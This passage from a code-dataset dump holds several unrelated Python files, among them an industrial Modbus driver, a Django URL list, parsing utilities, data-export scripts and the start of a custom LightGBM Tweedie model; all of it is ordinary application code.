Component current API gravity tenths\r\n gravidadTR=client.read_holding_registers(6676,2,unit=1)\r\n #Meter k-factor\r\n kFactor=client.read_holding_registers(1770,2,unit=1)\r\n\r\n if temperaturaTRprm.registers[0]!=0:\r\n producto=\"premium\"\r\n else:\r\n producto=\"regular\"\r\n\r\n\r\n #Esto lo modifiqué con mis variables\r\n servidor_driver_ucl = {\r\n \"timestamp\": listToString(timeStamp.registers),\r\n \"data\": \"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\",\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"driver_ucl_rt\",\r\n },\r\n \"ucl\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"ucl\",\r\n \"id_instrumentacion\": \"23\",\r\n \"nombre\": \"UCL 01\",\r\n \"producto1\": \"regular\",\r\n \"producto2\": \"premium\"\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_en_espera\": False,\r\n \"estado_en_uso\": True,\r\n },\r\n \"data_orden\":{\r\n \"id_orden_actual\": \"23\",\r\n \"cantidad_programada\": str(GOVsolicitado.registers[0]),\r\n \"cantidad_componente\": str(GOVcomponente.registers[0]),\r\n \"cantidad_cargada\": str(GOVtotal.registers[0]),\r\n \"cantidad_restante\": str(GOVtotal.registers[0]-GOVsolicitado.registers[0]),\r\n \"cantidad_gsv\": str(GSV.registers[0]),\r\n \"unidad\": \"l\",\r\n \"producto\": producto\r\n\r\n }\r\n },\r\n\r\n \"mdp\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"mdp\",\r\n \"id_instrumentacion\": \"23\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_en_espera\": False,\r\n \"estado_en_uso\": True\r\n },\r\n \"data\": {\r\n \"flujo\": formato_flujo(str(flujoTR.registers[0])),\r\n \"flujoPreset\": str(flujoPreset.registers[0]),\r\n \"unidad\": \"l/min\",\r\n }\r\n },\r\n \"rtd\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"rtd\",\r\n \"id_instrumentacion\": \"26\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"temperatura\": formato_temperatura(str((temperaturaTRrgl.registers[0]/100)+(temperaturaTRprm.registers[0]/100))),\r\n \"temperaturaAvg\": str(temperaturaAvg.registers[0]),\r\n \"unidad\": \"c\",\r\n }\r\n },\r\n \"baumanometro\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"baumanometro\",\r\n \"id_instrumentacion\": \"36\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"presion\": str(presionTR.registers[0]),\r\n \"presionPreset\": str(presionPreset.registers[0]),\r\n \"unidad\": \"kPa\",\r\n }\r\n },\r\n \"densimetro\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"densimetro\",\r\n \"id_instrumentacion\": \"37\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"densidadTR\": str(densidadTR.registers[0]),\r\n \"densidadComponent\": str(densidadComponent.registers[0]),\r\n \"unidad\": \"Kg m^3\",\r\n }\r\n },\r\n \"caudalimetro\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"caudalimetro\",\r\n \"id_instrumentacion\": \"38\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"masaTR\": str(masaTR.registers[0]),\r\n \"unidad\": \"s/u\",\r\n }\r\n },\r\n \"bsw\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"bsw\",\r\n \"id_instrumentacion\": \"39\",\r\n },\r\n \"servidor\": {\r\n 
\"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"BSWTR\": str(BSWTR.registers[0]),\r\n \"unidad\": \"s/u\",\r\n }\r\n },\r\n \"gravidad\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"gravidad\",\r\n \"id_instrumentacion\": \"40\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"gravidadTR\": str(gravidadTR.registers[0]),\r\n \"unidad\": \"s/u\",\r\n }\r\n },\r\n \"kFactor\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"kFactor\",\r\n \"id_instrumentacion\": \"26\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"online_status\": {\r\n \"estado_sensando\": True\r\n },\r\n \"data\": {\r\n \"kFactor\": str(kFactor.registers[0]),\r\n \"unidad\": \"adimensional\",\r\n }\r\n },\r\n \"vcf\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"vcf\",\r\n \"id_instrumentacion\": \"12\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_abierta\": False,\r\n }\r\n },\r\n # \"vcf_descarga\": {\r\n # \"config\": {\r\n # \"version\": 0.1,\r\n # \"tipo\": \"vcf\",\r\n # \"id_instrumentacion\": \"12\",\r\n # },\r\n # \"servidor\": {\r\n # \"online\": True,\r\n # },\r\n # \"data\": {\r\n # \"estado_abierta\": True,\r\n # }\r\n # },\r\n \"valvula_de_tanques\":[\r\n {\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"vcf\",\r\n \"id_instrumentacion\": \"12\",\r\n \"producto\": \"regular\"\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_abierta\": True,\r\n }\r\n },\r\n {\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"vcf\",\r\n \"id\": \"12\",\r\n \"producto\": \"premium\"\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_abierta\": True,\r\n }\r\n },\r\n # {\r\n # \"config\": {\r\n # \"version\": 0.1,\r\n # \"tipo\": \"vcf\",\r\n # \"id\": \"12\",\r\n # \"producto\": \"diesel\"\r\n # },\r\n # \"servidor\": {\r\n # \"online\": True,\r\n # },\r\n # \"data\": {\r\n # \"estado_abierta\": True,\r\n # }\r\n # }\r\n ],\r\n \"permisivo_tierra\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"permisivo\",\r\n \"id_instrumentacion\": \"12\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_activado\": True,\r\n }\r\n },\r\n \"permisivo_sobrellenado\":{\r\n \"config\": {\r\n \"version\": 0.1,\r\n \"tipo\": \"permisivo\",\r\n \"id_instrumentacion\": \"12\",\r\n },\r\n \"servidor\": {\r\n \"online\": True,\r\n },\r\n \"data\": {\r\n \"estado_activado\": True,\r\n }\r\n }\r\n }\r\n\r\n json_txt = json.dumps( servidor_driver_ucl)\r\n\r\n await conn.write_message(json_txt)\r\n\r\n await asyncio.sleep(0.5)\r\n\r\n client.close()\r\n\r\n\r\n \r\n \r\n except ConnectionRefusedError:\r\n print('error: ConnectionRefusedError')\r\n sys.exit(1)\r\n except TimeoutError:\r\n print('error: TimeoutError')\r\n sys.exit(1)\r\n print('done')\r\n sys.exit(0)\r\n\r\nasyncio.run(main())","sub_path":"driver/modbus2websocket.py","file_name":"modbus2websocket.py","file_ext":"py","file_size_in_byte":18425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"150928027","text":"from django.urls import path\nfrom .views import customerView, orderView, orderDetails, salesView,placing_order\n\nurlpatterns = [\n path('customer/',customerView.as_view()), # url to add and get customers\n path('order/',orderView.as_view()), # url to add and 
get orders\n path('details//', orderDetails.as_view()),\n path('sales/',salesView.as_view()), # url to add and get sales-person\n path('order/delivery//',placing_order.as_view()), # url to palce and confirm orders\n # path('order/new/',placeOrder.as_view()),\n]\n","sub_path":"quickapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"16358287","text":"\r\ndef get_diff_index(seq):\r\n\tlast = None\r\n\tfor i, x in enumerate(seq, start=0):\r\n\t\tif not last:\r\n\t\t\tlast = x\r\n\t\tif not last == x:\r\n\t\t\treturn i\r\ndef run(seq):\r\n\tcount = 0\r\n\tlength = len(seq)\r\n\twhile not seq.count('+') == length:\r\n\t\tdiff = get_diff_index(seq)\r\n\t\tif diff is None:\r\n\t\t\tseq = '+'*length\r\n\t\telif not diff == length:\r\n\t\t\tseq = seq[diff]*diff + seq[diff:]\r\n\t\tcount +=1\r\n\treturn count\r\n\r\ntxt = ''\r\nwith open('B-large.in', 'r') as f:\r\n\ttxt = f.read()\r\n\ttxt = txt.split('\\n')\r\n\twith open('b.out', 'w') as f:\r\n\t\tfor test_case in range(1, int(txt.pop(0))+1):\r\n\t\t\tseq = txt.pop(0)\r\n\t\t\tf.write('Case #%d: %d\\n'%(test_case, run(seq)))","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_SecondX_codejamb.py","file_name":"16_0_2_SecondX_codejamb.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"251801851","text":"import logging\nimport re\nimport itg\n\n# ============================================================================\n# Setup logging\n# ============================================================================\nlogging.basicConfig(level=logging.CRITICAL,\n format='%(levelname)-9s: %(name)s : %(funcName)s() : %(message)s')\nlog = logging.getLogger('template_models')\nlog.setLevel(logging.DEBUG)\n\n\n# ============================================================================\n# AhltaTemplate: dictionary-based template model\n# ============================================================================\nclass AhltaTemplate:\n \n # Constructor\n def __init__(self, fhand, logging=True):\n self.header = []\n self.pages = {}\n self.logging = logging\n\n with open(fhand, 'r', encoding='latin1') as f:\n if self.logging:\n log.warning('file arbitrarily opened as latin1 encoding')\n self.template = f.readlines()\n\n # TODO make this a try block\n if self._validate_template():\n self._parse_items()\n self._parse_header()\n else:\n log.error('Template validation failed.')\n\n # Private Methods\n def _validate_template(self):\n if self.logging:\n log.warning('partially implemented')\n log.info(f'Form Signature: {itg.validate_form_signature(self.template[0])}')\n log.info(f'Form Identification: {itg.validate_form_identification(self.template[1])}')\n log.info(f'Form Object: {itg.validate_form_obj(self.template[2])}')\n log.info(f'Tabstrip Object: {itg.validate_tabstrip_obj(self.template[3])}')\n log.info(f'BrowseTree Object: {itg.validate_browsetree_obj(self.template[4])}')\n #log.info(f'Form Item: {itg.Validator.validate_form_item(self.template[5])}')\n return True\n\n\n def _parse_items(self):\n # Store items by page in a dictionary, using page numbers as keys\n line_num = 1\n for line in self.template:\n if line_num <= 5: # first five lines belong to the header\n self.header.append(line) \n else:\n #line = line.rstrip() # strip any newline characters\n tokens = line.split(',', maxsplit=9) # split into tokens\n key = 
int(tokens[0]) # use the first token as the key\n if key not in self.pages:\n self.pages[key] = [] # add that key with an empty (unnamed) list\n self.pages[key].append(line) # otherwise add the line to an existing list\n line_num += 1\n\n \n def _parse_header(self):\n # Extract template-level information\n self.form_signature = self.header[0].rstrip() #version of medcin form designer software\n self.form_name = self.header[1].split(',', maxsplit=9)[0]\n self.form_owner = self.header[1].split(',', maxsplit=9)[1]\n self.form_group = self.header[1].rstrip().split(',', maxsplit=9)[2]\n self.form_sid = 'none'\n if len(self.header[1].split(',', maxsplit=9)) == 4:\n self.form_sid = self.header[1].rstrip().split(',', maxsplit=9)[3]\n \n # get page names and count\n self.page_names = self._parse_page_names()\n #self.page_count = len(self.visible_page_names)\n self.page_count = len(self.pages)\n \n # Setup important header pieces\n self.form_obj = self.header[2]\n self.tabstrip = self.header[3]\n self.browsetree = self.header[4]\n \n # ensure we've got the Form line (3rd line of header) before getting width, height\n if int(itg.FLAGS(self.form_obj)) == itg.ControlFlag.FORM:\n \n self.form_width = itg.RIGHT(self.form_obj)\n self.form_height = itg.BOTTOM(self.form_obj)\n \n else:\n print('ERROR: Incorrect flag on line 3 of header (should be 1048576')\n print(f'Line 3 of header: {self.form_obj}')\n \n # ensure we've got the TabStrip obj\n if int(itg.FLAGS(self.tabstrip)) == itg.ControlFlag.TABSTRIP:\n form_backcolor_search = re.search('(?<=:)(.*?)(?=:)', itg.DESCRIPTION(self.tabstrip))\n if form_backcolor_search:\n self.form_backcolor = form_backcolor_search.group(1)\n \n #self.form_border_style -BS\n #self.form_default_checkbox_style -CB\n #self.details_frame -DF\n #self.form_em_button -EM\n #self.form_flowsheet_button -FB\n #self.form_multirow -MR\n #self.form_negative_buttons -NB\n #self.form_positive_buttons -PB\n #self.form_picklist_button -PL\n #self.form_page_style -PS\n #self.form_ros_button -ROS\n #self.form_tabstrip_button_placement -TP\n #self.form_tabstrip_tab_width -TWS\n #self.form_version -V\n # often you see L=V= ... 
unclear why or if necessary\n else:\n print('ERROR: Incorrect flag on line 4 of header (should be 32)')\n print(f'Line 4 of header: {self.tabstrip}')\n\n def _parse_page_names(self):\n # Page names need to be cleaned of prefixes and suffixes:\n # :numbers: for page 1 indicates back color of the form\n # # (no_browsing), < (left_lateral), > (right_lateral)\n # %int denotes number of columns on the page\n # ~int as a suffix denotes a narrative chapter assignment\n raw = itg.DESCRIPTION(self.header[3])\n \n tokens = raw.strip('\\\"').split('|')\n clean_tokens = []\n clean_tokens.append('')\n \n page_one = re.sub(r'\\%\\d','',tokens[0].split(':')[len(tokens[0].split(':')) - 1])\n clean_tokens.append(page_one)\n \n for page in range(len(tokens)):\n if page == 0:\n continue\n else:\n cleaned_page = re.sub(r'\\%\\d','',tokens[page])\n clean_tokens.append(cleaned_page)\n \n return clean_tokens\n\n\n def _parse_form_properties(self):\n pass\n\n\n def _validate_header(self):\n # ToDo:\n # header lines are in the expected place\n # form_sid is accounted for\n # specified page count matches number of page names (for visible pages,\n # ignoring page 0)\n # Form object is the third item, and has a width and height\n # TabStrip object is appropriate\n # BrowseTree object is appropriate\n pass\n\n \n # Public Methods\n def info(self):\n page_info = f'Pages ({self.page_count}):\\n'\n for page, item_list in sorted(self.pages.items()):\n page_label = str(page) + f' [{self.page_names[page]}]'\n page_info += f' {page_label}: {len(item_list)} items\\n'\n \n return(f'Template: {self.form_name}\\n' +\n f'Owner: {self.form_owner}\\n' +\n f'Group: {self.form_group}\\n' +\n f'Software: {self.form_signature}\\n' +\n f'Security ID: {self.form_sid}\\n\\n' +\n f'Width: {self.form_width} pixels\\n' +\n f'Height: {self.form_height} pixels\\n\\n' +\n page_info +\n f'Total (including header): {len(self.template)} items'\n )\n \n def print_info(self):\n print(self.info())\n \n def print_header(self):\n for line in self.header:\n print(line)\n \n def print_by_page(self, page):\n print(f'Page: {page} ({(len(self.pages[page]))} items)')\n for line in self.pages[page]:\n print(line.rstrip())\n\n# ============================================================================\n# AhltaTemplateDF: dataframe-based template model\n# ============================================================================\nimport pandas as pd\n\nclass AhltaTemplateDF:\n # Constructor\n def __init__(self, fhand, logging=True):\n self.header = []\n self.pages = {}\n self.logging = logging\n\n with open(fhand, 'r', encoding='latin1') as f:\n if self.logging:\n log.warning('File arbitrarily opened as latin1 encoding.')\n self.template = f.readlines()\n\n self._parse_items()\n\n def _parse_items(self):\n # Store items in a dataframe of series\n imported_items = []\n cols = ['page', 'left', 'top', 'right', 'bottom', 'medcin', 'flags',\n 'prefix', 'item_data', 'description']\n\n line_num = 1\n for line in self.template:\n if line_num <= 5: # first five lines belong to the header\n self.header.append(line)\n else:\n imported_items.append(pd.Series(itg.item_to_simple_series(line), index=cols))\n\n line_num += 1\n\n self.items = pd.DataFrame(imported_items, columns=cols)\n\n # Public methods\n def info(self):\n print('Item counts by page:')\n print(self.items.page.value_counts().sort_index())\n print('\\nFlag counts:')\n print(self.items.flags.value_counts().sort_index())\n\n# ============================================================================\n# 
AhltaTemplateXml: xml-based template model\n# ============================================================================\nclass AhltaTemplateXml:\n pass\n\n\n# ===========================================================================+\n# XML-related functions\n# TODO: MOVE INTO ITEM_PARSER OR MAKE ITS OWN CLASS\n# ===========================================================================+\nimport xml.etree.ElementTree as ET\n#from ahlta_template import ahlta_template\n#from ahlta_item import item_Parser as ip\n\n# Takes a parsed item (from parse_template_item) and returns an xml node\n# This WILL break if used for items without every property \n# e.g., \"\" for prefix or description without a tilde\ndef detailed_parsed_item_to_xml(parsed_item, name='item'):\n subelements = [\n 'page',\n 'left', 'top', 'right', 'bottom',\n 'medcin_id', 'flags', \n 'prefix', 'modifier', 'result',\n 'status', 'value', 'link_group',\n 'units', 'box_offset', 'inline_textbox_width',\n 'component_sequence', 'index_to_reference_list',\n 'narrative_group_assignment', \n 'chky_caption', 'chkn_caption', 'bit_flags',\n 'limit_max', 'limit_min', 'ribbon_trigger_id',\n 'cluster_id', 'parent_ribbon_id', 'radio_button_group',\n 'image_id', 'hotspot_set_id', 'parent_frame',\n 'code_mapping', 'user_assigned_subgroup',\n 'item_data', 'caption', 'content'\n ]\n \n item_node = ET.Element(name)\n \n for i in range(len(subelements)):\n sub_el = ET.SubElement(item_node, subelements[i])\n sub_el.text = parsed_item[i]\n \n return item_node\n\n\ndef simple_parsed_item_to_xml(item, name):\n subelements = [\n 'page',\n 'left', 'top', 'right', 'bottom',\n 'medcin_id', 'flags', \n 'prefix', 'item_data', 'description'\n ]\n \n item_node = ET.Element(name)\n \n for i in range(len(subelements)):\n sub_el = ET.SubElement(item_node, subelements[i])\n sub_el.text = item[i]\n \n return item_node \n\n\ndef unparsed_item_to_xml(item, name):\n parsed = item.rstrip().split(',', maxsplit=9) # simple parse\n return simple_parsed_item_to_xml(parsed, name) \n\n\ndef convert_template_to_xml(template):\n # TODO: Do we need to write xml version/encoding info first?\n \n template_xml = ET.Element('template')\n header = ET.SubElement(template_xml, 'header')\n \n for i in range(template.page_count+1): # +1 b/c page_count ignores page_0\n # setup the node for the page\n node_name = 'page_' + str(i)\n page_node = ET.SubElement(template_xml, node_name)\n \n for item in template.pages[i]:\n ctrl_flag = str(itg.FLAGS(item))\n item_node = unparsed_item_to_xml(item, ctrl_flag)\n page_node.append(item_node)\n \n # Use template name as filename\n f_out = template.form_name.strip('\"') + '.xml'\n \n # Write to file with xml declaration\n ET.ElementTree(template_xml).write(f_out, encoding='utf-8', xml_declaration=True) \n\n\n#convert_template_to_xml(template)","sub_path":"itg/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"646214931","text":"import pandas as pd\nimport DB\nimport datetime\nimport time\nimport os\n\n\npath = os.getcwd()\nnow = datetime.datetime.now() + datetime.timedelta( hours=-1)\ntime = now.strftime(\"%Y-%m-%d %H\")\nuser_size = DB.user_size()\n\n\ndef DB_Data_Csv_Save():\n timestamp = []\n temp = []\n humidity =[]\n gas =[]\n water = []\n volt = []\n\n for i in range(user_size):\n data = DB.select_data(i)\n water_data =DB.select_water(i)\n gas_data =DB.select_gas(i)\n volt_data =DB.select_volt(i)\n\n for j in 
range(len(data)):\n timestamp.append(data[j][0])\n temp.append(data[j][1])\n humidity.append(data[j][2])\n gas.append(gas_data[j][0])\n water.append(water_data[j][0])\n volt.append(volt_data[j][0])\n\n label = {'timestamp' : timestamp, 'temp' : temp ,'humidity':humidity , 'gas' : gas, 'water' : water, 'volt': volt}\n\n dataframe = pd.DataFrame(label)\n dataframe.to_csv(f'{path}\\Data\\Time_Serial_Anomaly{time}_{i}.csv',index=False,header=True )\n\n #list clear\n timestamp.clear()\n temp.clear()\n humidity.clear()\n gas.clear()\n water.clear()\n volt.clear()\n","sub_path":"DB_csv.py","file_name":"DB_csv.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"279478748","text":"\"\"\"\nA script that grabs a text file, and splits the file into separate words\n\"\"\"\n\nfrom copy import copy\nimport string\n\ndef convertInvalidCharacters(inputString):\n \"\"\"Take a string and replace any non-english characters or spaces with spaces, then return the result\n\n This method converts any characters that aren't a-z or A-Z or a space into space.\n\n Arguments:\n inputString (string): The string to be processed.\n\n Returns:\n returnVal (string): A copy of the input with the invalid characters removed.\n \"\"\"\n def validChar(char):\n \"\"\"Check if the character given is a lowercase english, uppercase english or a space character.\"\"\"\n isValid = False\n if char in string.ascii_lowercase:\n isValid = True\n if char in string.ascii_uppercase:\n isValid = True\n if char == ' ':\n isValid = True\n\n return isValid\n\n returnVal = copy(inputString)\n\n for index, char in enumerate(inputString):\n if not validChar(char):\n returnVal = returnVal[:index] + ' ' + returnVal[index+1:]\n\n return returnVal\n\ndef main(inputFilename):\n \"\"\"Process inputFile and write it to a text file called splitwords.txt\n\n This method takes the input file, converts all non-english characters to spaces, then converts all characters to\n uppercase, and finally tokenizes the file (space delimiited) and outputs the result to a text file.\n\n Arguments:\n inputFilename (string): The file to read from\n \"\"\"\n with open(inputFilename, \"r\") as file:\n fileString = \"\"\n for line in file:\n fileString += line\n\n fileString = convertInvalidCharacters(fileString)\n\n fileString = fileString.upper()\n\n words = fileString.split()\n\n with open(\"../output/splitwords.txt\", \"w\") as outputFile:\n for word in words:\n if len(word) != 1:\n print(word, file=outputFile)\n\nif __name__ == '__main__':\n # Uncomment the other line to use the other file as input\n filename = \"../inputFiles/essaysOfFrancisBacon.txt\"\n # filename = \"../inputFiles/hamletByShakespeare.txt\"\n main(filename)\n","sub_path":"src/splitFile.py","file_name":"splitFile.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"10290434","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\pylon\\io\\parsing_util.py\n# Compiled at: 2010-12-26 13:36:33\n\"\"\" Defines convenience pyparsing constructs and token converters.\n\nBased on sparser.py by Tim Cera timcera@earthlink.net.\n\"\"\"\nfrom pyparsing import TokenConverter, oneOf, string, Literal, Group, Word, Optional, Combine, sglQuotedString, dblQuotedString, restOfLine, 
nums\n\nclass ToBoolean(TokenConverter):\n \"\"\" Converter to make token boolean \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\" Converts the first token to boolean \"\"\"\n return bool(tokenlist[0])\n\n\nclass ToInteger(TokenConverter):\n \"\"\" Converter to make token into an integer \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\" Converts the first token to an integer \"\"\"\n return int(tokenlist[0])\n\n\nclass ToFloat(TokenConverter):\n \"\"\" Converter to make token into a float \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\" Converts the first token into a float \"\"\"\n return float(tokenlist[0])\n\n\ndecimal_sep = '.'\nsign = oneOf('+ -')\nscolon = Literal(';').suppress()\nmatlab_comment = Group(Literal('%') + restOfLine).suppress()\npsse_comment = Literal('@!') + Optional(restOfLine)\nspecial_chars = string.replace('!\"#$%&\\'()*,./:;<=>?@[\\\\]^_`{|}~', decimal_sep, '')\nboolean = ToBoolean(ToInteger(Word('01', exact=1))).setName('bool')\ninteger = ToInteger(Combine(Optional(sign) + Word(nums))).setName('integer')\npositive_integer = ToInteger(Combine(Optional('+') + Word(nums))).setName('integer')\nnegative_integer = ToInteger(Combine('-' + Word(nums))).setName('integer')\nreal = ToFloat(Combine(Optional(sign) + Word(nums) + Optional(decimal_sep + Word(nums)) + Optional(oneOf('E e') + Optional(sign) + Word(nums)))).setName('real')\npositive_real = ToFloat(Combine(Optional('+') + Word(nums) + decimal_sep + Optional(Word(nums)) + Optional(oneOf('E e') + Word(nums)))).setName('real')\nnegative_real = ToFloat(Combine('-' + Word(nums) + decimal_sep + Optional(Word(nums)) + Optional(oneOf('E e') + Word(nums)))).setName('real')\nq_string = (sglQuotedString | dblQuotedString).setName('q_string')\ncolon = Literal(':')\nlbrace = Literal('{')\nrbrace = Literal('}')\nlbrack = Literal('[')\nrbrack = Literal(']')\nlparen = Literal('(')\nrparen = Literal(')')\nequals = Literal('=')\ncomma = Literal(',')\ndot = Literal('.')\nslash = Literal('/')\nbslash = Literal('\\\\')\nstar = Literal('*')\nsemi = Literal(';')\nat = Literal('@')\nminus = Literal('-')\ncomma_sep = comma.suppress()\n\ndef make_unique_name(base, existing=[], format='%s_%s'):\n \"\"\" Return a name, unique within a context, based on the specified name.\n\n @param base: the desired base name of the generated unique name.\n @param existing: a sequence of the existing names to avoid returning.\n @param format: a formatting specification for how the name is made unique.\n \"\"\"\n count = 2\n name = base\n while name in existing:\n name = format % (base, count)\n count += 1\n\n return name","sub_path":"pycfiles/Pylon-0.4.4-py2.6/parsing_util.py","file_name":"parsing_util.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"575895794","text":"errorlowV1fore = eventslowV1fore*(sum(lowV1foreenergy)/len(lowV1foreenergy))**2/(lowband*lowexposure*pixV1fore)\nerrorlowV1back = eventslowV1back*(sum(lowV1backenergy)/len(lowV1backenergy))**2/(lowband*lowexposure*pixV1back)\nerrormidV1fore = eventsmidV1fore*(sum(midV1foreenergy)/len(midV1foreenergy))**2/(midband*midexposure*pixV1fore)\nerrormidV1back = eventsmidV1back*(sum(midV1backenergy)/len(midV1backenergy))**2/(midband*midexposure*pixV1back)\nerrorhieV1fore = eventshieV1fore*(sum(hieV1foreenergy)/len(hieV1foreenergy))**2/(hieband*hieexposure*pixV1fore)\nerrorhieV1back = 
eventshieV1back*(sum(hieV1backenergy)/len(hieV1backenergy))**2/(hieband*hieexposure*pixV1back)\nerrormaxV1fore = eventsmaxV1fore*(sum(maxV1foreenergy)/len(maxV1foreenergy))**2/(maxband*maxexposure*pixV1fore)\nerrormaxV1back = eventsmaxV1back*(sum(maxV1backenergy)/len(maxV1backenergy))**2/(maxband*maxexposure*pixV1back)\n\n#exposure, band, pixel = easy\n#average energy comes easy from events and separation\n\n#events\n\n","sub_path":"new error bars.py","file_name":"new error bars.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"153001977","text":"#!/usr/bin/env python\n\n\"\"\"\nsetup.py file for SWIG KappaCUDA\n\"\"\"\n\nfrom distutils.core import setup, Extension\n\nKappaCUDA_module = Extension('_KappaCUDA',\n sources=['KappaCUDA_wrap.cpp'],\n define_macros=[('USE_OPENGL','1')],\n include_dirs=['/usr/local/cuda/include', '/Program Files/Kappa/include'],\n library_dirs=['/Program Files/Kappa/lib'],\n libraries=['Kappa', 'KappaConfig', 'KappaParser', 'KappaPlugin', 'ffi', 'pcrecpp', 'cuda'],\n )\n\nsetup (name = 'KappaCUDA',\n version = '1.5.0',\n author = 'Psi Lambda LLC',\n author_email='kappa@psilambda.com',\n url='http://psilambda.com',\n description = \"\"\"Module to give easy access to NVIDIA CUDA from Python using the Kappa Library.\"\"\",\n ext_modules = [KappaCUDA_module],\n py_modules = [\"KappaCUDA\"],\n )\n","sub_path":"pypi_install_script/KappaCUDA-1.5.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"587282300","text":"\"\"\"Modified version of Driverless AI's internal LightGBM implementation with tweedie distribution\n\"\"\"\nfrom h2oaicore.models import BaseCustomModel, LightGBMModel\nimport numpy as np\n\n\nclass TweedieLightGBMModel(BaseCustomModel, LightGBMModel):\n _regression = True\n _binary = False\n _multiclass = False\n _mojo = True\n _is_reproducible = False # might not reproduce identically on GPUs\n _testing_can_skip_failure = False # ensure tested as if shouldn't fail\n\n _tweedie_variance_power = 1.5 # PLEASE CONFIGURE\n\n _description = \"LightGBM with Tweedie distribution with tweedie variance power=%g\" % _tweedie_variance_power\n _display_name = \"LightGBM tweedie variance power=%g\" % _tweedie_variance_power\n\n @property\n def has_pred_contribs(self):\n return False # wouldn't sum up to preds\n\n def set_default_params(self,\n accuracy=None, time_tolerance=None, interpretability=None,\n **kwargs):\n # First call the LightGBM set_default_params\n # This will input all model parameters just like DAI would do.\n LightGBMModel.set_default_params(\n self,\n accuracy=accuracy,\n time_tolerance=time_tolerance,\n interpretability=interpretability,\n **kwargs\n )\n # Now we just need to tell LightGBM to use tweedie distribution\n self.params[\"objective\"] = \"tweedie\"\n self.params[\"tweedie_variance_power\"] = TweedieLightGBMModel._tweedie_variance_power\n\n def mutate_params(\n self, get_best=False, time_tolerance=10, accuracy=10, interpretability=1,\n imbalance_ratio=1.0,\n train_shape=(1, 1), ncol_effective=1,\n time_series=False, ensemble_level=0,\n score_f_name: str = None, **kwargs):\n # If we don't override the parent mutate_params method, DAI would have the opportunity\n # to modify the objective and select the winner\n # For demonstration purposes we purposely make sure that the objective\n # is the one we want\n # So 
